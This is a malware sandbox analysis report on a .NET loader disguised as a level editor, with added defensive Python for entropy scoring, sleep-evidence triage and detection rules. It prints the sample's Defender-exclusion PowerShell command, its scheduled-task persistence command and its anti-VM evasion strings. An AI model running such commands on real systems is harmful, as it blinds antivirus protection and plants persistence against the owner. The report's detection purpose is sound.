Source: gZfDBpJYZ.exe.0.dr, MegaMan.LevelEditor/MainForm.cs | .Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 0.0.03SPwb995m.exe.8f0000.0.unpack, MegaMan.LevelEditor/MainForm.cs | .Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 0.2.03SPwb995m.exe.8f0000.0.unpack, MegaMan.LevelEditor/MainForm.cs | .Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 8.0.03SPwb995m.exe.780000.9.unpack, MegaMan.LevelEditor/MainForm.cs | .Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 8.0.03SPwb995m.exe.780000.2.unpack, MegaMan.LevelEditor/MainForm.cs | .Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 8.0.03SPwb995m.exe.780000.1.unpack, MegaMan.LevelEditor/MainForm.cs | .Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 8.0.03SPwb995m.exe.780000.3.unpack, MegaMan.LevelEditor/MainForm.cs | .Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 8.0.03SPwb995m.exe.780000.5.unpack, MegaMan.LevelEditor/MainForm.cs | .Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 8.0.03SPwb995m.exe.780000.7.unpack, MegaMan.LevelEditor/MainForm.cs | .Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: C:\Users\user\Desktop\03SPwb995m.exe | Code function: 0_2_02BBC6BA push esp; ret 0_2_02BBC6C1
Source: C:\Users\user\Desktop\03SPwb995m.exe | Code function: 0_2_02BBC6B8 pushad ; ret 0_2_02BBC6B9
Source: C:\Users\user\Desktop\03SPwb995m.exe | Code function: 8_3_00FCBC57 push es; retf 8_3_00FCBC58 (4 times)
Source: C:\Users\user\Desktop\03SPwb995m.exe | Code function: 8_3_00FB26E7 pushfd ; retf 8_3_00FB26E9 (2 times)
Source: C:\Users\user\Desktop\03SPwb995m.exe | Code function: 8_3_00FB6DCC pushad ; ret 8_3_00FB6DE5 (4 times)
Source: C:\Users\user\Desktop\03SPwb995m.exe | Code function: 8_3_00FB10B7 push edx; iretd 8_3_00FB10B9 (2 times)
Source: C:\Users\user\Desktop\03SPwb995m.exe | Code function: 8_3_00FB24A7 push es; ret 8_3_00FB24A8 (2 times)
Source: C:\Users\user\Desktop\03SPwb995m.exe | Code function: 8_3_00FB818D push es; iretd 8_3_00FB824C (4 times)
Source: C:\Users\user\Desktop\03SPwb995m.exe | Code function: 8_3_00FB215F push es; iretd 8_3_00FB2160 (2 times)
Source: C:\Users\user\Desktop\03SPwb995m.exe | Code function: 8_3_00FB124C push esp; iretd 8_3_00FB1255 (2 times)
Source: C:\Users\user\Desktop\03SPwb995m.exe | Code function: 8_2_0110E332 push eax; ret 8_2_0110E349
Source: C:\Users\user\Desktop\03SPwb995m.exe | Code function: 8_2_0110D95C push eax; ret 8_2_0110D95D
Source: C:\Users\user\Desktop\03SPwb995m.exe | Code function: 8_2_0110E38A push eax; ret 8_2_0110E349
Source: initial sample | Static PE information: section name: .text entropy: 7.79660930856 (2 times)
Source: C:\Users\user\Desktop\03SPwb995m.exe | File created: C:\Users\user\AppData\Roaming\gZfDBpJYZ.exe
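The .text entropy of 7.80 bits per byte reported above, together with the section flags listed under System Summary (IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ) and the AppDomain::Load(byte[]) call in the decompiled loader, is the static side of the unpacker finding: compiled code does not come close to 8 bits per byte, so an executable section that does is carrying encrypted or compressed data that the loader decrypts and loads reflectively. The following Python is added here as an illustration and is not part of the report; it walks a PE section table with the standard library only, decodes the IMAGE_SCN_* and IMAGE_FILE_* flags the report names, and scores each section's Shannon entropy. Because the sample itself is not on the page, it runs on a minimal synthetic 32-bit PE that it constructs inline, whose .text holds an incompressible byte pattern and whose .rsrc holds a single repeated byte.

```python
import math
import struct
from collections import Counter
from typing import Dict, List

# IMAGE_SECTION_HEADER.Characteristics and IMAGE_FILE_HEADER.Characteristics
# flags, values as in winnt.h.
IMAGE_SCN_CNT_CODE    = 0x00000020
IMAGE_SCN_CNT_INIT    = 0x00000040   # IMAGE_SCN_CNT_INITIALIZED_DATA
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ    = 0x40000000
IMAGE_SCN_MEM_WRITE   = 0x80000000
SECTION_FLAGS = {
    IMAGE_SCN_CNT_CODE: "IMAGE_SCN_CNT_CODE",
    IMAGE_SCN_CNT_INIT: "IMAGE_SCN_CNT_INITIALIZED_DATA",
    IMAGE_SCN_MEM_EXECUTE: "IMAGE_SCN_MEM_EXECUTE",
    IMAGE_SCN_MEM_READ: "IMAGE_SCN_MEM_READ",
    IMAGE_SCN_MEM_WRITE: "IMAGE_SCN_MEM_WRITE",
}
FILE_FLAGS = {0x0002: "EXECUTABLE_IMAGE", 0x0100: "32BIT_MACHINE"}
PACKED_THRESHOLD = 7.0   # bits/byte; plain compiled code sits well below this


def shannon_entropy(data: bytes) -> float:
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def _coff_offset(pe: bytes) -> int:
    if pe[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    return e_lfanew + 4


def file_flags(pe: bytes) -> List[str]:
    chars = struct.unpack_from("<H", pe, _coff_offset(pe) + 18)[0]
    return [name for bit, name in FILE_FLAGS.items() if chars & bit]


def section_report(pe: bytes) -> List[Dict]:
    """Parse the section table and score each section's raw data."""
    coff = _coff_offset(pe)
    n_sections = struct.unpack_from("<H", pe, coff + 2)[0]
    opt_size = struct.unpack_from("<H", pe, coff + 16)[0]
    table = coff + 20 + opt_size
    out = []
    for i in range(n_sections):
        hdr = table + 40 * i
        name, _vsize, _va, rawsize, rawptr = struct.unpack_from("<8sIIII", pe, hdr)
        chars = struct.unpack_from("<I", pe, hdr + 36)[0]
        ent = shannon_entropy(pe[rawptr:rawptr + rawsize])
        out.append({
            "name": name.rstrip(b"\0").decode("ascii", "replace"),
            "raw_size": rawsize,
            "flags": [n for f, n in SECTION_FLAGS.items() if chars & f],
            "entropy": round(ent, 3),
            # high-entropy *executable* section: code that is really packed data
            "likely_packed": ent >= PACKED_THRESHOLD and bool(chars & IMAGE_SCN_MEM_EXECUTE),
        })
    return out


def build_synthetic_pe() -> bytes:
    """Constructed 32-bit PE with two sections; not a real sample."""
    text_data = bytes(range(256)) * 16          # every byte equally likely: 8.0 bits/byte
    rsrc_data = b"A" * 4096                     # one symbol only: 0.0 bits/byte
    e_lfanew = 0x40
    # i386, 2 sections, no optional header, EXECUTABLE_IMAGE | 32BIT_MACHINE
    coff = struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, 0, 0x0102)
    headers_end = e_lfanew + 4 + 20 + 40 * 2
    text_ptr = (headers_end + 0x1FF) & ~0x1FF   # 512-byte file alignment
    rsrc_ptr = (text_ptr + len(text_data) + 0x1FF) & ~0x1FF

    def sec(name, va, data, ptr, flags):
        return struct.pack("<8sIIIIIIHHI", name, len(data), va, len(data), ptr, 0, 0, 0, 0, flags)

    sections = sec(b".text", 0x1000, text_data, text_ptr,
                   IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ)
    sections += sec(b".rsrc", 0x3000, rsrc_data, rsrc_ptr,
                    IMAGE_SCN_CNT_INIT | IMAGE_SCN_MEM_READ)
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    img = bytearray(dos + b"PE\0\0" + coff + sections)
    img += b"\0" * (text_ptr - len(img)) + text_data
    img += b"\0" * (rsrc_ptr - len(img)) + rsrc_data
    return bytes(img)


if __name__ == "__main__":
    pe = build_synthetic_pe()
    print("file flags:", file_flags(pe))
    for s in section_report(pe):
        print(s)
```

To apply it to a real file, pass `open(path, "rb").read()` to `section_report`; a .NET executable whose only code section scores near the threshold while being small (the initial sample here is a loader with a 12046-byte array initializer and a single `AppDomain.Load(byte[])` call) is the combination worth unpacking in a sandbox or debugger rather than statically.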

                      Boot Survival:

                      barindex
                      Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
                      Source: C:\Users\user\Desktop\03SPwb995m.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gZfDBpJYZ" /XML "C:\Users\user\AppData\Local\Temp\tmp7B67.tmp
                      Source: C:\Users\user\Desktop\03SPwb995m.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion:

                      Yara detected AntiVM3
                      Source: Yara match | File source: 00000000.00000002.678751363.0000000002F7E000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000002.678411503.0000000002DD1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: 03SPwb995m.exe PID: 1364, type: MEMORYSTR
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                      Source: 03SPwb995m.exe, 00000000.00000002.678751363.0000000002F7E000.00000004.00000001.sdmp, 03SPwb995m.exe, 00000000.00000002.678411503.0000000002DD1000.00000004.00000001.sdmp | Binary or memory string: SBIEDLL.DLL
                      Source: 03SPwb995m.exe, 00000000.00000002.678751363.0000000002F7E000.00000004.00000001.sdmp, 03SPwb995m.exe, 00000000.00000002.678411503.0000000002DD1000.00000004.00000001.sdmp | Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
                      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                      Source: C:\Users\user\Desktop\03SPwb995m.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
                      Source: C:\Users\user\Desktop\03SPwb995m.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\Desktop\03SPwb995m.exe TID: 7120 | Thread sleep time: -39419s >= -30000s
                      Source: C:\Users\user\Desktop\03SPwb995m.exe TID: 7156 | Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5684 | Thread sleep time: -9223372036854770s >= -30000s
                      Source: C:\Users\user\Desktop\03SPwb995m.exe TID: 5792 | Thread sleep time: -15679732462653109s >= -30000s
                      Source: C:\Users\user\Desktop\03SPwb995m.exe TID: 6748 | Thread sleep count: 1581 > 30
                      Source: C:\Users\user\Desktop\03SPwb995m.exe TID: 6748 | Thread sleep count: 8273 > 30
                      Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                      Source: C:\Users\user\Desktop\03SPwb995m.exe | Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6057
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2378
                      Source: C:\Users\user\Desktop\03SPwb995m.exe | Window / User API: threadDelayed 1581
                      Source: C:\Users\user\Desktop\03SPwb995m.exe | Window / User API: threadDelayed 8273
                      Source: C:\Users\user\Desktop\03SPwb995m.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\03SPwb995m.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\03SPwb995m.exe | Process information queried: ProcessInformation
                      Source: C:\Users\user\Desktop\03SPwb995m.exe | Thread delayed: delay time: 39419
                      Source: 03SPwb995m.exe, 00000000.00000002.678411503.0000000002DD1000.00000004.00000001.sdmpBinary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
                      Source: 03SPwb995m.exe, 00000000.00000002.678411503.0000000002DD1000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                      Source: 03SPwb995m.exe, 00000000.00000002.678411503.0000000002DD1000.00000004.00000001.sdmpBinary or memory string: vmware
                      Source: 03SPwb995m.exe, 00000008.00000002.923174649.00000000063E0000.00000004.00000010.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: 03SPwb995m.exe, 00000000.00000002.678411503.0000000002DD1000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
                      Source: C:\Users\user\Desktop\03SPwb995m.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\03SPwb995m.exeMemory allocated: page read and write | page guardJump to behavior
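One caveat a reviewer should apply to the delay evidence above: a .NET thread that waits for TimeSpan.MaxValue reports a delay of 922337203685477 ms (Int64.MaxValue ticks divided by the 10,000 ticks per millisecond, truncated). That value, which both the sample and the powershell.exe child show here, is a blocked thread waiting indefinitely, not a chosen sleep length, so it carries no evasion signal by itself. The 39419 ms sleep and the 1581/8273-iteration sleep loops are the patterns that actually stall a time-limited sandbox. The Python below is an added example, not part of the Joe Sandbox report: it parses the report's own "Thread delayed" and "Thread sleep count" line shapes, separates indefinite waits from real stalls, and names the processes worth a second look. The sample lines are constructed from this section; the thresholds (30 s single sleep, more than 30 loop iterations) are assumptions.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Set

TICKS_PER_MS = 10_000                        # .NET TimeSpan ticks are 100 ns
INT64_MAX = 2 ** 63 - 1
TIMESPAN_MAX_MS = INT64_MAX // TICKS_PER_MS  # 922337203685477, the value in the report

# Assumed thresholds (not taken from the report): what this example treats as
# a long single sleep and as a sleep loop worth flagging.
LONG_SLEEP_MS = 30_000
LOOP_COUNT_THRESHOLD = 30

PROCESS_RE = re.compile(r"Source:\s*(.+?\.exe)", re.IGNORECASE)
DELAY_RE = re.compile(r"delay time:\s*(\d+)", re.IGNORECASE)
COUNT_RE = re.compile(r"Thread sleep count:\s*(\d+)", re.IGNORECASE)


@dataclass(frozen=True)
class DelayEvidence:
    process: str
    delay_ms: Optional[int] = None
    sleep_count: Optional[int] = None


def parse_evidence_line(line: str) -> Optional[DelayEvidence]:
    """Parse one 'Thread delayed' or 'Thread sleep count' line as the report prints them."""
    proc = PROCESS_RE.search(line)
    if not proc:
        return None
    delay = DELAY_RE.search(line)
    count = COUNT_RE.search(line)
    if not delay and not count:
        return None
    return DelayEvidence(
        process=proc.group(1),
        delay_ms=int(delay.group(1)) if delay else None,
        sleep_count=int(count.group(1)) if count else None,
    )


def classify(ev: DelayEvidence) -> str:
    """Label one piece of evidence.

    'indefinite-wait' is a TimeSpan.MaxValue wait (a thread blocked forever on
    an event or join), which says nothing about evasion on its own;
    'long-sleep' and 'sleep-loop' are the patterns that stall a sandbox.
    """
    if ev.delay_ms is not None:
        if ev.delay_ms == TIMESPAN_MAX_MS:
            return "indefinite-wait"
        return "long-sleep" if ev.delay_ms >= LONG_SLEEP_MS else "short-sleep"
    if ev.sleep_count is not None and ev.sleep_count > LOOP_COUNT_THRESHOLD:
        return "sleep-loop"
    return "short-sleep"


def summarize(lines: List[str]) -> Dict[str, Set[str]]:
    """Map each process image to the set of timing behaviours seen for it."""
    out: Dict[str, Set[str]] = {}
    for line in lines:
        ev = parse_evidence_line(line)
        if ev:
            out.setdefault(ev.process, set()).add(classify(ev))
    return out


def evasion_suspects(lines: List[str]) -> List[str]:
    """Processes with at least one real stalling pattern, ignoring indefinite waits."""
    summary = summarize(lines)
    return sorted(p for p, kinds in summary.items() if kinds & {"long-sleep", "sleep-loop"})


# Constructed sample: the evidence strings from this section, in the shape the report prints them.
SAMPLE_LINES = [
    r"Source: C:\Users\user\Desktop\03SPwb995m.exe TID: 6748Thread sleep count: 1581 > 30",
    r"Source: C:\Users\user\Desktop\03SPwb995m.exe TID: 6748Thread sleep count: 8273 > 30",
    r"Source: C:\Users\user\Desktop\03SPwb995m.exeThread delayed: delay time: 922337203685477",
    r"Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477",
    r"Source: C:\Users\user\Desktop\03SPwb995m.exeThread delayed: delay time: 39419",
]

if __name__ == "__main__":
    for proc, kinds in summarize(SAMPLE_LINES).items():
        print(proc, sorted(kinds))
    print("suspects:", evasion_suspects(SAMPLE_LINES))
```

Run against the lines above, powershell.exe ends up with only an indefinite wait and drops out of the suspect list, while the sample keeps both a 39 s sleep and two sleep loops. The same separation is worth applying to any sandbox vendor's "thread delayed" output before counting it as an evasion indicator.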

HIPS / PFW / Operating System Protection Evasion:

Adds a directory exclusion to Windows Defender
Source: C:\Users\user\Desktop\03SPwb995m.exe; Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gZfDBpJYZ.exe"
Source: C:\Users\user\Desktop\03SPwb995m.exe; Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gZfDBpJYZ" /XML "C:\Users\user\AppData\Local\Temp\tmp7B67.tmp"
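The two process creations above are the pair a detection engineer would want to catch on an endpoint: a user-profile executable spawning powershell.exe to add a Defender exclusion for a file under AppData, and schtasks.exe registering a task from an XML file in the user's Temp directory. The Python below is an added example, not part of the Joe Sandbox report and not a Sigma rule: it runs both checks over process-creation events and grades the exclusion finding by how suspicious the context is (exclusion target under AppData, parent running from a user profile). The event dicts are constructed from the command lines shown above; the field names parent_image, image and command_line are an assumption modelled on Sysmon event ID 1, and the third, benign-looking event is invented to show the low-severity path.

```python
import re
from typing import Dict, List, Optional

# Field names are an assumption modelled on Sysmon event ID 1.
Event = Dict[str, str]
Finding = Dict[str, str]

USER_PROFILE_RE = re.compile(r"^[a-z]:\\users\\", re.IGNORECASE)
APPDATA_RE = re.compile(r"\\Users\\[^\\]+\\AppData\\", re.IGNORECASE)
TEMP_RE = re.compile(r"\\AppData\\Local\\Temp\\", re.IGNORECASE)
# Matches only the plain cmdlet form seen in this report; encoded or
# obfuscated invocations need script-block logging, not command-line matching.
EXCLUSION_RE = re.compile(
    r'Add-MpPreference\s+-Exclusion(Path|Process|Extension)\s+"?([^"]+)', re.IGNORECASE)
TASK_XML_RE = re.compile(r'/xml\s+"?([^"]+)', re.IGNORECASE)


def check_defender_exclusion(ev: Event) -> Optional[Finding]:
    """powershell.exe adding a Defender exclusion; severity rises with suspicious context."""
    if not ev["image"].lower().endswith("powershell.exe"):
        return None
    m = EXCLUSION_RE.search(ev["command_line"])
    if not m:
        return None
    kind, target = m.group(1), m.group(2).strip()
    reasons = [f"Add-MpPreference -Exclusion{kind} {target}"]
    if APPDATA_RE.search(target):
        reasons.append("excluded path is under a user-writable AppData directory")
    if USER_PROFILE_RE.search(ev["parent_image"]):
        reasons.append("parent process runs from a user profile path")
    return {
        "rule": "defender_exclusion",
        "severity": "high" if len(reasons) > 1 else "low",
        "detail": "; ".join(reasons),
    }


def check_schtasks_temp_xml(ev: Event) -> Optional[Finding]:
    """schtasks /Create that reads its task definition from the user's Temp directory."""
    if not ev["image"].lower().endswith("schtasks.exe"):
        return None
    cmd = ev["command_line"]
    if not re.search(r"/create\b", cmd, re.IGNORECASE):
        return None
    m = TASK_XML_RE.search(cmd)
    if not m or not TEMP_RE.search(m.group(1)):
        return None
    return {
        "rule": "schtasks_temp_xml",
        "severity": "high",
        "detail": f"task registered from XML in Temp: {m.group(1).strip()}",
    }


CHECKS = (check_defender_exclusion, check_schtasks_temp_xml)


def scan(events: List[Event]) -> List[Finding]:
    """Apply every check to every event, in event order."""
    findings: List[Finding] = []
    for ev in events:
        for check in CHECKS:
            f = check(ev)
            if f:
                findings.append(f)
    return findings


# Constructed events: the first two are the command lines from this section,
# the third is an invented, benign-looking exclusion added from an explorer-launched console.
SAMPLE_EVENTS: List[Event] = [
    {"parent_image": r"C:\Users\user\Desktop\03SPwb995m.exe",
     "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" '
                     r'Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gZfDBpJYZ.exe"'},
    {"parent_image": r"C:\Users\user\Desktop\03SPwb995m.exe",
     "image": r"C:\Windows\SysWOW64\schtasks.exe",
     "command_line": r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gZfDBpJYZ" '
                     r'/XML "C:\Users\user\AppData\Local\Temp\tmp7B67.tmp"'},
    {"parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r'powershell.exe Add-MpPreference -ExclusionPath "C:\Program Files\BuildAgent"'},
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f["severity"].upper(), f["rule"], f["detail"])
```

Note that the first check deliberately still reports the administrator-style exclusion, only at low severity: any exclusion is worth an audit trail, because once it is in place the dropped binary in that path is invisible to Defender. On a live host, Get-MpPreference shows the current ExclusionPath list and Remove-MpPreference takes the entry back out.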
Source: C:\Users\user\Desktop\03SPwb995m.exe; Process created: C:\Users\user\Desktop\03SPwb995m.exe C:\Users\user\Desktop\03SPwb995m.exe
Source: 03SPwb995m.exe, 00000008.00000002.918848488.0000000001500000.00000002.00020000.sdmp; Binary or memory string: Program Manager
Source: 03SPwb995m.exe, 00000008.00000002.918848488.0000000001500000.00000002.00020000.sdmp; Binary or memory string: Shell_TrayWnd
Source: 03SPwb995m.exe, 00000008.00000002.918848488.0000000001500000.00000002.00020000.sdmp; Binary or memory string: Progman
Source: 03SPwb995m.exe, 00000008.00000002.918848488.0000000001500000.00000002.00020000.sdmp; Binary or memory string: Progmanlock
Source: C:\Users\user\Desktop\03SPwb995m.exe; Queries volume information: C:\Users\user\Desktop\03SPwb995m.exe VolumeInformation
Source: C:\Users\user\Desktop\03SPwb995m.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\03SPwb995m.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\03SPwb995m.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\03SPwb995m.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\Desktop\03SPwb995m.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
